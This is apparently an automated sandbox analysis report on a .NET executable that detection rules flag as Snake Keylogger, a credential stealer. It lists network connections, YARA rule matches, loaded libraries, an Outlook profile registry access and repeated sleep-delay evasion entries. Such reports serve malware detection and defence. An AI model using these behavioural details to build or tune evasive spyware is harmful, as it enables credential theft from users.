                          Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49752 version: TLS 1.2

                          System Summary

                          barindex
                          Source: z64BLPL.exe, type: SAMPLEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                          Source: z64BLPL.exe, type: SAMPLEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                          Source: z64BLPL.exe, type: SAMPLEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                          Source: 0.0.z64BLPL.exe.690000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                          Source: 0.0.z64BLPL.exe.690000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                          Source: 0.0.z64BLPL.exe.690000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                          Source: 00000000.00000000.1673795940.0000000000692000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                          Source: Process Memory Space: z64BLPL.exe PID: 7268, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                          Source: C:\Users\user\Desktop\z64BLPL.exeProcess Stats: CPU usage > 49%
                          Source: C:\Users\user\Desktop\z64BLPL.exeCode function: 0_2_00BFC5710_2_00BFC571
                          Source: C:\Users\user\Desktop\z64BLPL.exeCode function: 0_2_00BF268C0_2_00BF268C
                          Source: C:\Users\user\Desktop\z64BLPL.exeCode function: 0_2_00BF57080_2_00BF5708
                          Source: C:\Users\user\Desktop\z64BLPL.exeCode function: 0_2_00D3A0880_2_00D3A088
                          Source: C:\Users\user\Desktop\z64BLPL.exeCode function: 0_2_00D3C1460_2_00D3C146
                          Source: C:\Users\user\Desktop\z64BLPL.exeCode function: 0_2_00D371180_2_00D37118
                          Source: C:\Users\user\Desktop\z64BLPL.exeCode function: 0_2_00D3D2CB0_2_00D3D2CB
                          Source: C:\Users\user\Desktop\z64BLPL.exeCode function: 0_2_00D353620_2_00D35362
                          Source: C:\Users\user\Desktop\z64BLPL.exeCode function: 0_2_00D3C4680_2_00D3C468
                          Source: C:\Users\user\Desktop\z64BLPL.exeCode function: 0_2_00D3D5990_2_00D3D599
                          Source: C:\Users\user\Desktop\z64BLPL.exeCode function: 0_2_00D3C7380_2_00D3C738
                          Source: C:\Users\user\Desktop\z64BLPL.exeCode function: 0_2_00D369A00_2_00D369A0
                          Source: C:\Users\user\Desktop\z64BLPL.exeCode function: 0_2_00D3EAA80_2_00D3EAA8
                          Source: C:\Users\user\Desktop\z64BLPL.exeCode function: 0_2_00D3FC370_2_00D3FC37
                          Source: C:\Users\user\Desktop\z64BLPL.exeCode function: 0_2_00D3CD280_2_00D3CD28
                          Source: C:\Users\user\Desktop\z64BLPL.exeCode function: 0_2_00D3CFF70_2_00D3CFF7
                          Source: C:\Users\user\Desktop\z64BLPL.exeCode function: 0_2_00D3F7EC0_2_00D3F7EC
                          Source: C:\Users\user\Desktop\z64BLPL.exeCode function: 0_2_00D339ED0_2_00D339ED
                          Source: C:\Users\user\Desktop\z64BLPL.exeCode function: 0_2_00D329EC0_2_00D329EC
                          Source: C:\Users\user\Desktop\z64BLPL.exeCode function: 0_2_00D3EA9B0_2_00D3EA9B
                          Source: C:\Users\user\Desktop\z64BLPL.exeCode function: 0_2_00D33AA10_2_00D33AA1
                          Source: C:\Users\user\Desktop\z64BLPL.exeCode function: 0_2_00D33E090_2_00D33E09
                          Source: C:\Users\user\Desktop\z64BLPL.exeCode function: 0_2_066996C80_2_066996C8
                          Source: C:\Users\user\Desktop\z64BLPL.exeCode function: 0_2_06699DF00_2_06699DF0
                          Source: C:\Users\user\Desktop\z64BLPL.exeCode function: 0_2_066922880_2_06692288
                          Source: C:\Users\user\Desktop\z64BLPL.exeCode function: 0_2_06690B300_2_06690B30
                          Source: C:\Users\user\Desktop\z64BLPL.exeCode function: 0_2_06691BA80_2_06691BA8
                          Source: C:\Users\user\Desktop\z64BLPL.exeCode function: 0_2_066929700_2_06692970
                          Source: C:\Users\user\Desktop\z64BLPL.exeCode function: 0_2_066951A80_2_066951A8
                          Source: C:\Users\user\Desktop\z64BLPL.exeCode function: 0_2_0669CE200_2_0669CE20
                          Source: C:\Users\user\Desktop\z64BLPL.exeCode function: 0_2_0669CE0F0_2_0669CE0F
                          Source: C:\Users\user\Desktop\z64BLPL.exeCode function: 0_2_0669D6C00_2_0669D6C0
                          Source: C:\Users\user\Desktop\z64BLPL.exeCode function: 0_2_0669D6D00_2_0669D6D0
                          Source: C:\Users\user\Desktop\z64BLPL.exeCode function: 0_2_0669DF7F0_2_0669DF7F
                          Source: C:\Users\user\Desktop\z64BLPL.exeCode function: 0_2_0669DF800_2_0669DF80
                          Source: C:\Users\user\Desktop\z64BLPL.exeCode function: 0_2_0669EC780_2_0669EC78
                          Source: C:\Users\user\Desktop\z64BLPL.exeCode function: 0_2_066994A80_2_066994A8
                          Source: C:\Users\user\Desktop\z64BLPL.exeCode function: 0_2_0669EC880_2_0669EC88
                          Source: C:\Users\user\Desktop\z64BLPL.exeCode function: 0_2_0669F5280_2_0669F528
                          Source: C:\Users\user\Desktop\z64BLPL.exeCode function: 0_2_06698D200_2_06698D20
                          Source: C:\Users\user\Desktop\z64BLPL.exeCode function: 0_2_0669F5380_2_0669F538
                          Source: C:\Users\user\Desktop\z64BLPL.exeCode function: 0_2_06698D110_2_06698D11
                          Source: C:\Users\user\Desktop\z64BLPL.exeCode function: 0_2_06699D890_2_06699D89
                          Source: C:\Users\user\Desktop\z64BLPL.exeCode function: 0_2_0669D2780_2_0669D278
                          Source: C:\Users\user\Desktop\z64BLPL.exeCode function: 0_2_066922780_2_06692278
                          Source: C:\Users\user\Desktop\z64BLPL.exeCode function: 0_2_0669DB280_2_0669DB28
                          Source: C:\Users\user\Desktop\z64BLPL.exeCode function: 0_2_06690B200_2_06690B20
                          Source: C:\Users\user\Desktop\z64BLPL.exeCode function: 0_2_0669DB190_2_0669DB19
                          Source: C:\Users\user\Desktop\z64BLPL.exeCode function: 0_2_0669E3CA0_2_0669E3CA
                          Source: C:\Users\user\Desktop\z64BLPL.exeCode function: 0_2_0669E3D80_2_0669E3D8
                          Source: C:\Users\user\Desktop\z64BLPL.exeCode function: 0_2_06691B970_2_06691B97
                          Source: C:\Users\user\Desktop\z64BLPL.exeCode function: 0_2_066900400_2_06690040
                          Source: C:\Users\user\Desktop\z64BLPL.exeCode function: 0_2_0669E82F0_2_0669E82F
                          Source: C:\Users\user\Desktop\z64BLPL.exeCode function: 0_2_0669E8300_2_0669E830
                          Source: C:\Users\user\Desktop\z64BLPL.exeCode function: 0_2_066900060_2_06690006
                          Source: C:\Users\user\Desktop\z64BLPL.exeCode function: 0_2_0669F0E00_2_0669F0E0
                          Source: C:\Users\user\Desktop\z64BLPL.exeCode function: 0_2_0669F0D10_2_0669F0D1
                          Source: C:\Users\user\Desktop\z64BLPL.exeCode function: 0_2_0669F9820_2_0669F982
                          Source: C:\Users\user\Desktop\z64BLPL.exeCode function: 0_2_066951980_2_06695198
                          Source: C:\Users\user\Desktop\z64BLPL.exeCode function: 0_2_0669F9900_2_0669F990
                          Source: z64BLPL.exe, 00000000.00000002.4120472413.0000000000D6E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs z64BLPL.exe
                          Source: z64BLPL.exe, 00000000.00000002.4119946936.0000000000AF7000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs z64BLPL.exe
                          Source: z64BLPL.exe, 00000000.00000000.1673826294.00000000006D6000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs z64BLPL.exe
                          Source: z64BLPL.exeBinary or memory string: OriginalFilenameRemington.exe4 vs z64BLPL.exe
                          Source: z64BLPL.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: z64BLPL.exe, type: SAMPLEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                          Source: z64BLPL.exe, type: SAMPLEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                          Source: z64BLPL.exe, type: SAMPLEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                          Source: 0.0.z64BLPL.exe.690000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                          Source: 0.0.z64BLPL.exe.690000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                          Source: 0.0.z64BLPL.exe.690000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                          Source: 00000000.00000000.1673795940.0000000000692000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                          Source: Process Memory Space: z64BLPL.exe PID: 7268, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                          Source: z64BLPL.exe, .csCryptographic APIs: 'TransformFinalBlock'
                          Source: z64BLPL.exe, -J--.csCryptographic APIs: 'TransformFinalBlock'
                          Source: z64BLPL.exe, -J--.csCryptographic APIs: 'TransformFinalBlock'
                          Source: classification engineClassification label: mal100.troj.spyw.winEXE@1/0@4/4
                          Source: C:\Users\user\Desktop\z64BLPL.exeMutant created: NULL
                          Source: z64BLPL.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: z64BLPL.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.79%
                          Source: C:\Users\user\Desktop\z64BLPL.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                          Source: z64BLPL.exeReversingLabs: Detection: 73%
                          Source: C:\Users\user\Desktop\z64BLPL.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeSection loaded: rasapi32.dllJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeSection loaded: rasman.dllJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeSection loaded: rtutils.dllJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeSection loaded: dhcpcsvc6.dllJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeSection loaded: dhcpcsvc.dllJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeSection loaded: secur32.dllJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeSection loaded: schannel.dllJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeSection loaded: mskeyprotect.dllJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeSection loaded: ntasn1.dllJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeSection loaded: ncrypt.dllJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeSection loaded: ncryptsslp.dllJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeSection loaded: dpapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                          Source: z64BLPL.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                          Source: z64BLPL.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Source: C:\Users\user\Desktop\z64BLPL.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeMemory allocated: D30000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeMemory allocated: 2A10000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeMemory allocated: 2850000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeThread delayed: delay time: 600000Jump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeThread delayed: delay time: 599875Jump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeThread delayed: delay time: 599765Jump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeThread delayed: delay time: 599636Jump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeThread delayed: delay time: 599531Jump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeThread delayed: delay time: 599421Jump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeThread delayed: delay time: 599312Jump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeThread delayed: delay time: 599203Jump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeThread delayed: delay time: 599093Jump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeThread delayed: delay time: 598984Jump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeThread delayed: delay time: 598875Jump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeThread delayed: delay time: 598765Jump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeThread delayed: delay time: 598656Jump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeThread delayed: delay time: 598546Jump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeThread delayed: delay time: 598437Jump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeThread delayed: delay time: 598328Jump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeThread delayed: delay time: 598218Jump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeThread delayed: delay time: 598109Jump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeThread delayed: delay time: 597996Jump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeThread delayed: delay time: 597888Jump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeThread delayed: delay time: 597741Jump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeThread delayed: delay time: 597637Jump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeThread delayed: delay time: 597531Jump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeThread delayed: delay time: 597417Jump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeThread delayed: delay time: 597312Jump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeThread delayed: delay time: 597203Jump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeThread delayed: delay time: 597093Jump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeThread delayed: delay time: 596984Jump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeThread delayed: delay time: 596875Jump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeThread delayed: delay time: 596765Jump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeThread delayed: delay time: 596656Jump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeThread delayed: delay time: 596547Jump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeThread delayed: delay time: 596437Jump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeThread delayed: delay time: 596328Jump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeThread delayed: delay time: 596217Jump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeThread delayed: delay time: 596109Jump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeThread delayed: delay time: 596000Jump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeThread delayed: delay time: 595890Jump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeThread delayed: delay time: 595781Jump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeThread delayed: delay time: 595672Jump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeThread delayed: delay time: 595547Jump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeThread delayed: delay time: 595437Jump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeThread delayed: delay time: 595328Jump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeThread delayed: delay time: 595218Jump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeThread delayed: delay time: 595109Jump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeThread delayed: delay time: 594993Jump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeThread delayed: delay time: 594890Jump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeThread delayed: delay time: 594781Jump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeThread delayed: delay time: 594671Jump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeThread delayed: delay time: 594562Jump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeWindow / User API: threadDelayed 8582Jump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeWindow / User API: threadDelayed 1284Jump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364Thread sleep time: -26747778906878833s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364Thread sleep time: -600000s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364Thread sleep time: -599875s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7368Thread sleep count: 8582 > 30Jump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7368Thread sleep count: 1284 > 30Jump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364Thread sleep time: -599765s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364Thread sleep time: -599636s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364Thread sleep time: -599531s >= -30000sJump to behavior
